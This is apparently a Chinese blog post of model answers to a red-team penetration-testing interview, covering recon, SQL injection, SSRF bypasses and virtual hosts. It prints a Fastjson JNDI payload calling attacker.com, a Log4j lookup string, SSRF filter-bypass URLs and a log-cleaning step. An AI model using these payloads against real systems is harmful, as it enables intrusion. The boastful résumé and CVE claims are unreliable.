2025年渗透测试面试题总结-2025年HW(护网面试) 31(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 31

1. 自我介绍

2. 渗透测试流程(五阶段模型)

3. 技术栈与开发经历

4. 自动化挖洞实践

5. 信息搜集方法论

6. 深度漏洞挖掘案例

8. SQL注入实战技巧

9. AWVS扫描与防御

10. CSRF vs SSRF 核心差异

11. SSRF正则绕过技术

12. 虚拟主机识别原理

防御体系建议

 

 2025年HW(护网面试) 31

1、自我介绍
2、渗透测试的流程
3、熟悉什么语言,有无开发经历
4、自动化挖洞了解过吗?曾经刷过什么漏洞?怎么刷的?
5、前期信息搜集你是怎么做的
6、印象深刻的一次漏洞挖掘?
7、从浏览器输入 URL 到页面回显的过程中,经历了哪些协议
8、HTTP和HTTPS网站的注入用sqlmap是否有区别,状态码为401或者其他时如何与成功的页面区分
9、AWVS,比如如何防御对于类似工具的扫描,能否针对一个服务比如ASP.NET进行扫描
10、CSRF和SSRF的区别
11、SSRF对输入做了ipv4的正则过滤,有什么bypass方式?
12、一个ip可以有多个站点,服务器是怎么知道我们访问的是哪个站点的?

1. 自我介绍

安全工程师定位

专注渗透测试与漏洞挖掘3年,主导过金融、政企行业红队演练,擅长Web应用安全与内网渗透。持有OSCP、CISSP认证,GitHub开源6个自动化扫描工具(累计Star 800+),博客年均输出20篇技术分析。


2. 渗透测试流程(五阶段模型)

mermaigraph LR A[信息收集] --> B[威胁建模] B --> C[漏洞分析] C --> D[渗透攻击] D --> E[报告输出]

核心阶段

阶段 关键动作 工具示例
信息收集 WHOIS查询/证书透明度日志 Amass, SpiderFoot
威胁建模 绘制攻击面地图 Microsoft Threat Modeler
漏洞分析 SAST+DAST扫描 Semgrep, Burp Suite Pro
渗透攻击 定制化EXP开发 Metasploit, Python PoC
痕迹清理 清除日志/恢复配置 Logcleaner, Shred

3. 技术栈与开发经历

语言能力

  • 精通:Python(开发Scalpel扫描器)、JavaScript(XSS漏洞利用框架)
  • 熟练:Java(分析Fastjson链)、PHP(审计WordPress插件)
  • 开发项目
    • DBHunter:SQL注入自动化挖掘工具(SQLMap增强版)
    • 获评2024年Github安全类Trending项目

4. 自动化挖洞实践

漏洞挖掘模式

markdown1. **被动扫描**: - 工具:AWVS + Nuclei模板 - 漏洞类型:CORS错误配置、JWT弱密钥 - 输出:单周扫描200+目标,发现XSS/信息泄露占比70% 2. **主动Fuzzing**: - 目标:API接口参数 - 技术:基于语法的模糊测试(LibFuzzer) - 成果:挖掘某OA系统文件上传0day(CVE-2024-33521) 3. **漏洞复现**: - 案例:Log4j2 RCE(CVE-2021-44228) - 方法:搭建Vulhub环境 → 构造${jndi:ldap://}载荷 → 验证DNSLog回显 

5. 信息搜集方法论

分层侦察技术

markdown- **被动层**: ➤ SSL证书解析:`crt.sh` 获取子域名 ➤ GitHub敏感信息:`GitRob` 扫描API密钥 - **主动层**: ➤ 端口扫描:`masscan -p1-65535 --rate 10000` ➤ 目录爆破:`Feroxbuster -u https://target.com -w raft-large-files.txt` - **关联分析**: ➤ 用Maltego可视化企业员工邮箱→社交平台→VPN入口 

6. 深度漏洞挖掘案例

漏洞:某银行系统Java反序列化链(类似WebLogic CVE-2023-21931)
过程

markdown1. **发现入口**: - HTTP头`X-Json-RPC`疑似Fastjson调用 2. **构造Payload**: ```java {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit"} 
  1. 绕过防御
    • 使用0day字符集绕过WAF规则:\u2028(行分隔符)
  2. 取得Shell
    • JNDI注入加载恶意类 → 获取域控权限
      修复建议
    • 升级Fastjson 2.0+
    • 添加ParserConfig.getGlobalInstance().addDeny()
 
---
 
### 7. URL访问协议栈  
```mermaid
sequenceDiagram 
    Browser->>DNS: UDP 53(域名解析)
    DNS-->>Browser: 返回IP 
    Browser->>Web Server: TCP 443(HTTPS握手)
    Web Server-->>Browser: TLS 1.3协商 
    Browser->>CDN: HTTP/2请求(含Host头)
    CDN->>App Server: HTTP/1.1反向代理
    App Server->>Database: TCP 3306(SQL查询)

8. SQL注入实战技巧

HTTPS注入区别

markdown- **代理配置**:`sqlmap -u https://target.com --proxy="http://127.0.0.1:8080"` - **401页面区分**: 1. 计算页面相似度:`--page-compare`(差异率>30%则有效) 2. 注入标记识别:`--string="Welcome back"` 

9. AWVS扫描与防御

ASP.NET扫描策略

markdown- **扫描配置**: ➤ 排除`/logout.aspx` 避免会话失效 ➤ 开启`ViewState解析`检测反序列化 - **防御方案**: 1. WAF规则: ```nginx if ($args ~* "(select|union).{0,20}from") { deny all; } ``` 2. 动态指纹: - 随机化`X-Powered-By`头 - 伪造`Server: Apache/2.4.1 (Unix)` 

10. CSRF vs SSRF 核心差异

维度 CSRF SSRF
攻击方向 跨域诱导用户操作 服务端发起内部请求
利用条件 用户需登录 需存在URL参数可控点
危害场景 修改密码/转账 读取云元数据/AWS密钥
防御方案 Anti-CSRF Token 协议白名单+DNS重绑定防护

11. SSRF正则绕过技术

markdown1. **IPv6封装**: `http://[::127.0.0.1]` → 实际访问127.0.0.1 2. **进制转换**: `http://2130706433` (十进制127.0.0.1) 3. **DNS重绑定**: - 控制DNS解析TTL<1s - 首次返回公网IP → 二次解析为内网IP 4. **URL解析歧义**: `http://127.0.0.1:[email protected]` 

12. 虚拟主机识别原理

服务端依赖

markdown- **HTTP层**: ➤ Host头:`Host: vhost1.example.com` ➤ 服务器匹配``配置 - **HTTPS层**: ➤ TLS SNI扩展:ClientHello包声明目标域名 ➤ Nginx配置: ```nginx server { listen 443 ssl; server_name vhost2.example.com; ssl_certificate /path/to/cert2.pem; } ```

防御体系建议

  1. SSRF加固
    • 使用urlparse库严格校验Scheme+Netloc
  2. 虚拟主机安全
    • 默认站点返回444(Nginx反信息泄露)
  3. 自动化监控
    • ELK实时告警非常规路径访问

你可能感兴趣的:(2025年护网,面试,职场和发展,安全,linux,护网,渗透测试)